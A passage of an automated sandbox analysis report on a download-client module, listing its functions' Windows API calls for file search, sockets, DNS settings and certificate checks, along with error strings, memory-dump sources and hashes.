                                                                                                                                              • FindFirstFileA.KERNEL32(?,?), ref: 1005CCF4
                                                                                                                                              • GetLastError.KERNEL32 ref: 1005CD03
                                                                                                                                              • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP71 ref: 1005CD14
                                                                                                                                              • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBD@Z.MSVCP71(102768F0), ref: 1005CD2C
                                                                                                                                              • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP71 ref: 1005CD52
                                                                                                                                              • ??3@YAXPAX@Z.MSVCR71(?), ref: 1005CD60
                                                                                                                                              • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP71 ref: 1005CD74
                                                                                                                                              • FindClose.KERNEL32(00000000), ref: 1005CDA4
                                                                                                                                              • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP71(?), ref: 1005CDB5
                                                                                                                                              • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP71 ref: 1005CDCE
                                                                                                                                                • Part of subcall function 10009F50: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP71(?,?,?,10013095,?,00000000,?,?,?,?,?,00000020,00000026,?,00000400,00000026), ref: 10009F65
                                                                                                                                                • Part of subcall function 10009F50: ??3@YAXPAX@Z.MSVCR71(?,?,?,?,10013095,?,00000000,?,?,?,?,?,00000020,00000026,?,00000400), ref: 10009F76
                                                                                                                                              • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP71 ref: 1005CDF1
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 0000000E.00000002.1619279871.0000000010001000.00000040.00000001.01000000.00000014.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                              • Associated: 0000000E.00000002.1619245039.0000000010000000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                              • Associated: 0000000E.00000002.1619279871.00000000102FE000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                              • Associated: 0000000E.00000002.1619279871.0000000010360000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                              • Associated: 0000000E.00000002.1619972434.000000001037F000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                              • Associated: 0000000E.00000002.1619997206.0000000010380000.00000004.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_14_2_10000000_MiniThunderPlatform.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: D@std@@U?$char_traits@V?$allocator@$D@2@@std@@$??1?$basic_string@$??0?$basic_string@$??3@D@1@@std@@D@2@@0@FindV01@@V?$basic_string@$??$?8??$?9CloseErrorFileFirstLastV01@VersionY?$basic_string@
                                                                                                                                              • String ID: Hosts$hosts
                                                                                                                                              • API String ID: 3749606605-2575723251
                                                                                                                                              • Opcode ID: 2b9d935adae9bb3190ad93673b41ab5b0768120ba05e43d9d5d519f5486a1b25
                                                                                                                                              • Instruction ID: 2260d7e3b3166f00db9d3bee59d158ab0cc18d3f91f7b59bf47c8bbf000ac08b
                                                                                                                                              • Opcode Fuzzy Hash: 2b9d935adae9bb3190ad93673b41ab5b0768120ba05e43d9d5d519f5486a1b25
                                                                                                                                              • Instruction Fuzzy Hash: 78518C351083919FD320CF24C888A9FBBE4EFAA714F044A5DF89A83251DB749548CFA3
                                                                                                                                              Function 10059650 Relevance: 33.4, APIs: 13, Strings: 6, Instructions: 154COMMON
                                                                                                                                              Download Yara Rule
                                                                                                                                              APIs
                                                                                                                                              • CreateEventA.KERNEL32(00000000,00000001,00000000,00000000), ref: 100596D6
                                                                                                                                              • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBD@Z.MSVCP71(Create request_list Event error), ref: 100596EC
                                                                                                                                                • Part of subcall function 1002BD70: ??0exception@@QAE@XZ.MSVCR71(?,?,00000000,102423C9,000000FF,1021B19D,00000000,?,10056267), ref: 1002BD8D
                                                                                                                                                • Part of subcall function 1002BD70: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP71(?), ref: 1002BDA9
                                                                                                                                              • _CxxThrowException.MSVCR71(?,102B6AA0,?), ref: 1005970F
                                                                                                                                              • GetTickCount.KERNEL32 ref: 1005971D
                                                                                                                                              • GetPrivateProfileIntA.KERNEL32(dns,pto_seconds,00000003,-00000004), ref: 10059772
                                                                                                                                              • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP71(?,?,?,?), ref: 1005977B
                                                                                                                                              • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP71 ref: 1005978A
                                                                                                                                              • GetPrivateProfileIntA.KERNEL32(dns,timeout_period,00000168,-00000004), ref: 100597D1
                                                                                                                                              • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP71(?,?,?,?,?,?,?,?), ref: 100597DA
                                                                                                                                              • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP71 ref: 100597E9
                                                                                                                                              • GetPrivateProfileIntA.KERNEL32(dns,timeout_counts_period,0000003C,-00000004), ref: 1005982D
                                                                                                                                              • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP71(?,?,?,?,?,?,?,?,?,?,?,?), ref: 10059836
                                                                                                                                              • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP71 ref: 10059845
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 0000000E.00000002.1619279871.0000000010001000.00000040.00000001.01000000.00000014.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                              • Associated: 0000000E.00000002.1619245039.0000000010000000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                              • Associated: 0000000E.00000002.1619279871.00000000102FE000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                              • Associated: 0000000E.00000002.1619279871.0000000010360000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                              • Associated: 0000000E.00000002.1619972434.000000001037F000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                              • Associated: 0000000E.00000002.1619997206.0000000010380000.00000004.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_14_2_10000000_MiniThunderPlatform.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: D@2@@std@@D@std@@U?$char_traits@V?$allocator@$??1?$basic_string@$PrivateProfile$??0?$basic_string@$??0exception@@CountCreateEventExceptionThrowTickV01@@
                                                                                                                                              • String ID: Create request_list Event error$dns$pto_seconds$stat.dat$timeout_counts_period$timeout_period
                                                                                                                                              • API String ID: 3601289781-4286181566
                                                                                                                                              • Opcode ID: 21562e41380aa452408df3b9dd44ca40aab9808455fc5cf2bbd7a28db062d0bb
                                                                                                                                              • Instruction ID: 09cfa8f55c4aaa8069e09845e468c5267cd1ecf2eb219d4d7996330143164a67
                                                                                                                                              • Opcode Fuzzy Hash: 21562e41380aa452408df3b9dd44ca40aab9808455fc5cf2bbd7a28db062d0bb
                                                                                                                                              • Instruction Fuzzy Hash: 39518EB55043819FD714DF68C888A9AFBE8FF69304F00895DF49A93652DBB4E508CF62
                                                                                                                                              Function 10048BF0 Relevance: 29.9, APIs: 14, Strings: 3, Instructions: 112networkCOMMON
                                                                                                                                              Download Yara Rule
                                                                                                                                              APIs
                                                                                                                                              • socket.WS2_32(00000002,00000001,00000006), ref: 10048C29
                                                                                                                                              • htons.WS2_32 ref: 10048C4F
                                                                                                                                              • bind.WS2_32(000000FF,00000002,00000010), ref: 10048C79
                                                                                                                                              • WSAGetLastError.WS2_32 ref: 10048C84
                                                                                                                                              • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBD@Z.MSVCP71(bind call error), ref: 10048C98
                                                                                                                                              • _CxxThrowException.MSVCR71(?,102B9B68,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 10048CC5
                                                                                                                                              • getsockname.WS2_32(000000FF,?,?), ref: 10048CE8
                                                                                                                                              • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBD@Z.MSVCP71(getsockname call error), ref: 10048CFC
                                                                                                                                              • _CxxThrowException.MSVCR71(?,102B9B68,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 10048D27
                                                                                                                                              • htons.WS2_32(?), ref: 10048D34
                                                                                                                                              • listen.WS2_32(000000FF,00000005), ref: 10048D44
                                                                                                                                              • WSAGetLastError.WS2_32 ref: 10048D4F
                                                                                                                                              • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBD@Z.MSVCP71(listen call error), ref: 10048D60
                                                                                                                                              • _CxxThrowException.MSVCR71(?,102B9B68,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 10048D90
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 0000000E.00000002.1619279871.0000000010001000.00000040.00000001.01000000.00000014.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                              • Associated: 0000000E.00000002.1619245039.0000000010000000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                              • Associated: 0000000E.00000002.1619279871.00000000102FE000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                              • Associated: 0000000E.00000002.1619279871.0000000010360000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                              • Associated: 0000000E.00000002.1619972434.000000001037F000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                              • Associated: 0000000E.00000002.1619997206.0000000010380000.00000004.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_14_2_10000000_MiniThunderPlatform.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: ??0?$basic_string@D@2@@std@@D@std@@ExceptionThrowU?$char_traits@V?$allocator@$ErrorLasthtons$bindgetsocknamelistensocket
                                                                                                                                              • String ID: bind call error$getsockname call error$listen call error
                                                                                                                                              • API String ID: 1873545918-4072321061
                                                                                                                                              • Opcode ID: 5bd5a8541dbb67bd95ebceb7e37830b5b6ff41ee5724ca2e9890f613cdda1151
                                                                                                                                              • Instruction ID: 6061e81bcbb5cd75baddf0e89d09f41c8d5b4957d8a706b57dd876c3ff4046c5
                                                                                                                                              • Opcode Fuzzy Hash: 5bd5a8541dbb67bd95ebceb7e37830b5b6ff41ee5724ca2e9890f613cdda1151
                                                                                                                                              • Instruction Fuzzy Hash: 134105750047919BC330DF60D888B9BB7F9FF98720F404E0DF59A92690DB75A548CB66
                                                                                                                                              Function 00436C90 Relevance: 21.2, APIs: 14, Instructions: 198encryptionmemoryCOMMON
                                                                                                                                              Download Yara Rule
                                                                                                                                              APIs
                                                                                                                                              • CryptQueryObject.CRYPT32(00000001,00000000,00000400,00000002,00000000,?,?,?,00000000,00000000,00000000), ref: 00436CF1
                                                                                                                                              • CryptMsgGetParam.CRYPT32(00000000,00000006,00000000,00000000,?), ref: 00436D1B
                                                                                                                                              • LocalAlloc.KERNEL32(00000040,?), ref: 00436D3D
                                                                                                                                              • CryptMsgGetParam.CRYPT32(00000000,00000006,00000000,00000000,?), ref: 00436D72
                                                                                                                                              • CertFindCertificateInStore.CRYPT32(00000000,00010001,00000000,000B0000,?,00000000), ref: 00436DD7
                                                                                                                                              • CertGetNameStringW.CRYPT32(00000000,00000004,00000000,00000000,00000000,00000000), ref: 00436E08
                                                                                                                                              • LocalAlloc.KERNEL32(00000040,00000000), ref: 00436E35
                                                                                                                                              • CertGetNameStringW.CRYPT32(00000000,00000004,00000000,00000000,00000000,00000000), ref: 00436E6B
                                                                                                                                              • ??4?$basic_string@_WU?$char_traits@_W@std@@V?$allocator@_W@2@@std@@QAEAAV01@PB_W@Z.MSVCP71(00000000), ref: 00436E88
                                                                                                                                              • LocalFree.KERNEL32(00000000), ref: 00436E9E
                                                                                                                                              • CertFreeCRLContext.CRYPT32(00000000), ref: 00436EB1
                                                                                                                                              • LocalFree.KERNEL32(00000000), ref: 00436EC7
                                                                                                                                              • CertCloseStore.CRYPT32(00000000,00000000), ref: 00436EDC
                                                                                                                                              • CryptMsgClose.CRYPT32(00000000), ref: 00436EEF
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 0000000E.00000002.1614044465.0000000000417000.00000040.00000001.01000000.0000000F.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              • Associated: 0000000E.00000002.1614008254.0000000000400000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                              • Associated: 0000000E.00000002.1614044465.0000000000448000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                              • Associated: 0000000E.00000002.1614044465.0000000000456000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                              • Associated: 0000000E.00000002.1614158449.000000000045A000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                              • Associated: 0000000E.00000002.1614181616.000000000045C000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_14_2_400000_MiniThunderPlatform.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: Cert$CryptLocal$Free$AllocCloseNameParamStoreString$??4?$basic_string@_CertificateContextFindObjectQueryU?$char_traits@_V01@V?$allocator@_W@2@@std@@W@std@@
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID: 1901610339-0
                                                                                                                                              • Opcode ID: 315dd38093dd16d626aca0698f8aee7929f8243d652272183dfc55defbda2940
                                                                                                                                              • Instruction ID: 9855d129bd1c4c46509c3229f4471534e49b447ee1d9d00d22a43a7a0cfa85ce
                                                                                                                                              • Opcode Fuzzy Hash: 315dd38093dd16d626aca0698f8aee7929f8243d652272183dfc55defbda2940
                                                                                                                                              • Instruction Fuzzy Hash: 837187B2D00218AFEB60EB95CC86FDDB774AB08304F028159F615BB281CB759D84CF99
                                                                                                                                              Function 10051530 Relevance: 15.9, APIs: 4, Strings: 5, Instructions: 124networkCOMMON
                                                                                                                                              Download Yara Rule
                                                                                                                                              APIs
                                                                                                                                              • WSARecvFrom.WS2_32(?,?,00000001,?,?,?,00000010,?,Function_00035BD0), ref: 1005165B
                                                                                                                                              • WSAGetLastError.WS2_32 ref: 10051666
                                                                                                                                              • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBD@Z.MSVCP71(asyn read request error), ref: 10051686
                                                                                                                                              • _CxxThrowException.MSVCR71(00000010,102B9B68,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 100516AD
                                                                                                                                                • Part of subcall function 100261B0: __EH_prolog.LIBCMT ref: 100261B5
                                                                                                                                                • Part of subcall function 100261B0: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBD@Z.MSVCP71(?,?,?), ref: 100261DE
                                                                                                                                                • Part of subcall function 100261B0: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP71(00000000,?,?), ref: 1002620C
                                                                                                                                                • Part of subcall function 100261B0: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP71(?,?), ref: 10026226
                                                                                                                                                • Part of subcall function 100261B0: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP71(?,?), ref: 1002623C
                                                                                                                                                • Part of subcall function 100261B0: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP71(?,?,?,?), ref: 1002625A
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 0000000E.00000002.1619279871.0000000010001000.00000040.00000001.01000000.00000014.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                              • Associated: 0000000E.00000002.1619245039.0000000010000000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                              • Associated: 0000000E.00000002.1619279871.00000000102FE000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                              • Associated: 0000000E.00000002.1619279871.0000000010360000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                              • Associated: 0000000E.00000002.1619972434.000000001037F000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                              • Associated: 0000000E.00000002.1619997206.0000000010380000.00000004.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_14_2_10000000_MiniThunderPlatform.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: D@2@@std@@D@std@@U?$char_traits@V?$allocator@$??0?$basic_string@??1?$basic_string@$ErrorExceptionFromH_prologLastRecvThrowV01@@
                                                                                                                                              • String ID: .\asyn_udp_device.cpp$asyn read request error$buffer_pos+expected_bytes <= operation_ptr->buffer_len()$operation_ptr->is_pending() == false$thunder_assert
                                                                                                                                              • API String ID: 2555452174-2844270807
                                                                                                                                              • Opcode ID: 03c40b7de2b612a432d914a7cf40f890ae5c82df867a1c908d303177aa63d4e0
                                                                                                                                              • Instruction ID: f96af627ed583a1d50f07d45b858b5d6197e0ae5425749f95e5110d3d4598a01
                                                                                                                                              • Opcode Fuzzy Hash: 03c40b7de2b612a432d914a7cf40f890ae5c82df867a1c908d303177aa63d4e0
                                                                                                                                              • Instruction Fuzzy Hash: 3D4168B1504740AFC360CF29C880F9BBBE9FB99304F548A1EF19AC7241EB71A4498B61
                                                                                                                                              Function 10051470 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 51networkCOMMON
                                                                                                                                              Download Yara Rule
                                                                                                                                              APIs
                                                                                                                                                • Part of subcall function 10051320: socket.WS2_32(00000002,00000002,00000000), ref: 1005134E
                                                                                                                                                • Part of subcall function 10051320: WSAGetLastError.WS2_32 ref: 1005135C
                                                                                                                                                • Part of subcall function 10051320: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBD@Z.MSVCP71(create socket object error), ref: 1005136D
                                                                                                                                                • Part of subcall function 10051320: _CxxThrowException.MSVCR71(?,102B9B68), ref: 10051397
                                                                                                                                                • Part of subcall function 10051320: WSAIoctl.WS2_32(?,9800000C,?,00000004,00000000,00000000,?,00000000,00000000), ref: 100513D0
                                                                                                                                                • Part of subcall function 10051320: setsockopt.WS2_32(000000FF,0000FFFF,00000020,?,00000001), ref: 100513ED
                                                                                                                                                • Part of subcall function 10051320: WSAGetLastError.WS2_32 ref: 100513F8
                                                                                                                                                • Part of subcall function 10051320: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBD@Z.MSVCP71(setsockopt error), ref: 10051409
                                                                                                                                                • Part of subcall function 10051320: _CxxThrowException.MSVCR71(?,102B9B68), ref: 10051433
                                                                                                                                              • htons.WS2_32 ref: 100514AB
                                                                                                                                              • bind.WS2_32(?,00000002,00000010), ref: 100514C9
                                                                                                                                              • WSAGetLastError.WS2_32 ref: 100514D4
                                                                                                                                              • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBD@Z.MSVCP71(bind call error), ref: 100514E5
                                                                                                                                                • Part of subcall function 1021ADF0: ??0exception@@QAE@XZ.MSVCR71(?,00000000), ref: 1021AE10
                                                                                                                                                • Part of subcall function 1021ADF0: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP71(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 1021AE35
                                                                                                                                                • Part of subcall function 1021ADF0: ??Y?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@PBD@Z.MSVCP71(, error code: ,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 1021AE47
                                                                                                                                                • Part of subcall function 1021ADF0: ?append@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV12@ABV12@@Z.MSVCP71 ref: 1021AE66
                                                                                                                                                • Part of subcall function 1021ADF0: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP71 ref: 1021AE75
                                                                                                                                              • _CxxThrowException.MSVCR71(?,102B9B68,?,?,?,?,?,?,?,00000000), ref: 1005150C
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 0000000E.00000002.1619279871.0000000010001000.00000040.00000001.01000000.00000014.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                              • Associated: 0000000E.00000002.1619245039.0000000010000000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                              • Associated: 0000000E.00000002.1619279871.00000000102FE000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                              • Associated: 0000000E.00000002.1619279871.0000000010360000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                              • Associated: 0000000E.00000002.1619972434.000000001037F000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                              • Associated: 0000000E.00000002.1619997206.0000000010380000.00000004.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_14_2_10000000_MiniThunderPlatform.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: D@2@@std@@D@std@@U?$char_traits@V?$allocator@$??0?$basic_string@$ErrorExceptionLastThrow$??0exception@@??1?$basic_string@?append@?$basic_string@IoctlV01@V01@@V12@V12@@Y?$basic_string@bindhtonssetsockoptsocket
                                                                                                                                              • String ID: bind call error
                                                                                                                                              • API String ID: 783829381-1626635801
                                                                                                                                              • Opcode ID: f329200eb68745b5efa11afc37109baab918e4765a8ae76cd840ed28a1bbb476
                                                                                                                                              • Instruction ID: e849399dc762896df87e43732bc9081cb0c143596f9c4c9f9cc28d9fefb3f081
                                                                                                                                              • Opcode Fuzzy Hash: f329200eb68745b5efa11afc37109baab918e4765a8ae76cd840ed28a1bbb476
                                                                                                                                              • Instruction Fuzzy Hash: 461149754047509FC314DBA4C849B8BB7E8FF98724F404A0DF1AA83690EB78A444CF52
                                                                                                                                              Function 100103A0 Relevance: 4.8, APIs: 3, Instructions: 284COMMON
                                                                                                                                              Download Yara Rule
                                                                                                                                              APIs
                                                                                                                                              • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP71(00000000,?,00000000,?,?,?,?,?,?,?,?,?,?,00000000), ref: 100103D7
                                                                                                                                              • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP71(?,?,?,?,?,?,?,?,?,00000000), ref: 100106A8
                                                                                                                                                • Part of subcall function 10009F20: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP71(?,?,1001055F,?,?), ref: 10009F32
                                                                                                                                              • ??3@YAXPAX@Z.MSVCR71(?,?,?), ref: 10010563
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 0000000E.00000002.1619279871.0000000010001000.00000040.00000001.01000000.00000014.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                              • Associated: 0000000E.00000002.1619245039.0000000010000000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                              • Associated: 0000000E.00000002.1619279871.00000000102FE000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                              • Associated: 0000000E.00000002.1619279871.0000000010360000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                              • Associated: 0000000E.00000002.1619972434.000000001037F000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                              • Associated: 0000000E.00000002.1619997206.0000000010380000.00000004.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_14_2_10000000_MiniThunderPlatform.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: D@2@@std@@D@std@@U?$char_traits@V?$allocator@$??1?$basic_string@$??0?$basic_string@??3@V01@@
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID: 4194848485-0
                                                                                                                                              • Opcode ID: 79217381df64c277370ac80563434996095487303d21e81361d1ea32492b2681
                                                                                                                                              • Instruction ID: 0a2b073cf7bac8470bdc1930ac11f13ecabdaddced3a231cee1018ae00352d09
                                                                                                                                              • Opcode Fuzzy Hash: 79217381df64c277370ac80563434996095487303d21e81361d1ea32492b2681
                                                                                                                                              • Instruction Fuzzy Hash: 8C91C6B5B00605AFD718CF6DCD85A6FB7EAEBC8600B14852CF84ADB755EA70ED408B50
                                                                                                                                              Function 100357B0 Relevance: 3.1, APIs: 2, Instructions: 138COMMON
                                                                                                                                              Download Yara Rule
                                                                                                                                              APIs
                                                                                                                                                • Part of subcall function 10001213: RtlInitializeCriticalSection.NTDLL ref: 10001225
                                                                                                                                              • RtlInitializeCriticalSection.NTDLL ref: 1003597B
                                                                                                                                              • GetSystemInfo.KERNEL32(?), ref: 10035992
                                                                                                                                                • Part of subcall function 100011E7: _CxxThrowException.MSVCR71(00000000,102B1D60,?,1000127C,00000000,?,1001C1AF,00000000,00000000), ref: 100011F9
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 0000000E.00000002.1619279871.0000000010001000.00000040.00000001.01000000.00000014.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                              • Associated: 0000000E.00000002.1619245039.0000000010000000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                              • Associated: 0000000E.00000002.1619279871.00000000102FE000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                              • Associated: 0000000E.00000002.1619279871.0000000010360000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                              • Associated: 0000000E.00000002.1619972434.000000001037F000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                              • Associated: 0000000E.00000002.1619997206.0000000010380000.00000004.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_14_2_10000000_MiniThunderPlatform.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: CriticalInitializeSection$ExceptionInfoSystemThrow
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID: 3868759970-0
                                                                                                                                              • Opcode ID: e95402c12abf66ea8c385486e1fbd4045d1a17dc73945e86bfd9c0ec492f5080
                                                                                                                                              • Instruction ID: 738c412b6c49469d1648e34ed2bba3b0f258f359db90fd7d0ed2bac339cd94fc
                                                                                                                                              • Opcode Fuzzy Hash: e95402c12abf66ea8c385486e1fbd4045d1a17dc73945e86bfd9c0ec492f5080
                                                                                                                                              • Instruction Fuzzy Hash: 6361CFB4904749CFC750CF29C584A86FBE0FB59300F54899EE89A8B312DB71E844CBA5
                                                                                                                                              Function 10027330 Relevance: 3.0, APIs: 2, Instructions: 30fileCOMMON
                                                                                                                                              Download Yara Rule
                                                                                                                                              APIs
                                                                                                                                              • FindFirstFileA.KERNEL32(?), ref: 1002735E
                                                                                                                                              • FindClose.KERNEL32(00000000), ref: 10027381
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 0000000E.00000002.1619279871.0000000010001000.00000040.00000001.01000000.00000014.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                              • Associated: 0000000E.00000002.1619245039.0000000010000000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                              • Associated: 0000000E.00000002.1619279871.00000000102FE000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                              • Associated: 0000000E.00000002.1619279871.0000000010360000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                              • Associated: 0000000E.00000002.1619972434.000000001037F000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                              • Associated: 0000000E.00000002.1619997206.0000000010380000.00000004.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_14_2_10000000_MiniThunderPlatform.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: Find$CloseFileFirst
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID: 2295610775-0
                                                                                                                                              • Opcode ID: d8432b3171507f007597301810f8dc507fb2f417d7f4f2b56e477a3ff35fdc69
                                                                                                                                              • Instruction ID: e83bfc26b3c75542e70e5b1f6b0e2592cee8d6bd85aed1661aeb180e60f16223
                                                                                                                                              • Opcode Fuzzy Hash: d8432b3171507f007597301810f8dc507fb2f417d7f4f2b56e477a3ff35fdc69
                                                                                                                                              • Instruction Fuzzy Hash: 66F054745002008FD734DB24D84EAD973E1FB5D314FC50A18E42EC72A2EB35A544D642
                                                                                                                                              Function 100A7A70 Relevance: 300.5, APIs: 137, Strings: 34, Instructions: 1284COMMON
                                                                                                                                              Download Yara Rule

                                                                                                                                              Control-flow Graph

                                                                                                                                              • Executed
                                                                                                                                              • Not Executed
